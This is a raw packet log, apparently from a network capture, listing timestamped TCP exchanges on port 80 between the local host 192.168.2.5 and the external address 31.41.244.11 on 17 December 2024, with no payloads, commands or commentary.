Dec 17, 2024 06:03:11.894561052 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.894614935 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.894632101 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.894682884 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.895755053 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.895811081 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.895847082 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.895896912 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.897032976 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.897046089 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.897089005 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.898206949 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.898220062 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.898267984 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.899362087 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.899418116 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.899446011 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.899502993 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.900610924 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.900624037 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.900667906 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.901781082 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.901801109 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.901837111 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.902913094 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.903019905 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.903075933 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.904129028 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.904190063 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.904191017 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.905327082 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.905384064 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.905453920 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.906232119 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.906562090 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.906615019 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.906667948 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.907645941 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.907704115 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.907741070 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.907820940 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.908958912 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.908971071 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.909028053 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.910073042 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.910126925 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.910164118 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.910214901 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.911247015 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.911369085 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.911433935 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.912523985 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.912535906 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.912623882 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.913706064 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.913717985 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.913773060 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.914905071 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.914916992 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.914973974 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.916102886 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.916116953 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.916176081 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.917206049 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.917260885 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.917296886 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.917349100 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.918363094 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.918544054 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.918616056 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.918724060 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.919574022 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.919642925 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.919692039 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.919753075 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.920896053 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.920908928 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.920958042 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.922069073 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.922136068 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.922180891 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.922287941 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.923155069 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.923237085 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.923243046 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.923290968 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.924380064 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.924568892 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.924578905 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.924632072 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.925640106 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.925652981 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.925698996 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.925714970 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.926753044 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.926820993 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.926858902 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.926908016 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.928031921 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.928045034 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.928127050 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.928127050 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.929131985 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.929246902 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.929260015 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.929327011 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.930330038 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.930397034 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.930398941 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.930455923 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.931593895 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.931605101 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.931649923 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.936326027 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.936500072 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.936505079 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.936511993 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.936522961 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.936570883 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.936598063 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.936857939 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.936870098 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.936923027 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.937980890 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.938035965 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.938150883 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.938208103 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.939135075 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.939193964 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.939301968 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.939363003 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.940304995 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.940453053 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.940510035 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.941190004 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.941200018 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.941212893 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.941225052 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.941246033 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.941277027 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.942285061 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.942336082 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.942346096 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.942395926 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.943438053 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.943526030 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.943558931 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.943618059 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.944596052 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.944643974 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.944740057 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.944793940 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.945889950 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.945943117 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.945952892 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.945986032 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.947025061 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.947087049 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.947103977 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.947655916 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.948215008 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.948276043 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.948369026 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.948422909 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.949407101 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.949419975 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.949465990 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.950562954 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.950709105 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.950767994 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.955558062 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.955569983 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.955576897 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.955583096 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.955637932 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.083941936 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.083955050 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.084156036 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.084461927 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.084472895 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.084531069 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.085572958 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.085625887 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.085654020 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.085706949 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.086725950 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.086777925 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.086858988 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.086909056 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.087941885 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.087997913 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.088015079 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.088067055 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.089195013 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.089243889 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.089297056 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.089345932 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.090415001 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.090425014 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.090470076 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.091564894 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.091618061 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.091618061 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.091686964 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.092808962 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.092828989 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.092864037 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.094002008 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.094012976 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.094058037 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.095096111 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.095151901 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.095299006 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.095356941 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.096432924 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.096484900 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.096599102 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.096647978 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.097578049 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.097625971 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.097706079 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.097754002 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.098701954 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.098715067 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.098753929 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.099941969 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.099993944 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.100470066 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.100519896 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.101166964 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.101178885 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.101221085 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.102293968 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.102346897 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.102653027 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.102704048 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.103559017 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.103570938 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.103611946 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.104743004 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.104754925 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.104798079 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.105904102 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.105916023 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.105962992 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.107065916 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.107184887 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.107237101 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.108345985 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.108356953 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.108405113 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.109405041 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.109460115 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.109538078 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.109591007 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.110734940 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.110791922 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.110850096 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.110901117 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.111828089 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.111881018 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.111927986 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.111977100 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.113132000 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.113142967 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.113183975 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.114274979 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.114285946 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.114329100 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.115362883 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.115467072 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.115497112 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.115546942 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.116564989 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.116616964 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.116650105 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.116698027 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.117849112 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.117860079 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.117901087 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.119131088 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.119142056 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.119185925 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.120213985 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.120269060 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.120306969 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.120358944 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.121407986 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.121428013 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.121471882 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.123219967 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.123230934 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.123298883 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.123827934 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.123837948 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.123888016 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.123934984 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.124918938 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.125021935 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.125087976 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.128285885 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.128303051 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.128314018 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.128324986 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.128400087 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.128767967 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.128779888 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.128832102 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.129894018 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.130063057 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.130120993 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.131108999 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.131119967 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.131160021 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.132239103 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.132250071 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.132293940 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.133569956 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.133580923 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.133626938 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.134653091 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.134896040 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.134949923 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.135958910 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.136010885 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.136094093 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.137048960 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.137099981 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.137209892 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.137309074 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.138253927 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.138264894 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.138355970 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.139369011 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.139522076 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.139575958 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.139611959 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.140688896 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.140701056 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.140750885 CET	49830	80	192.168.2.5	31.41.244.11
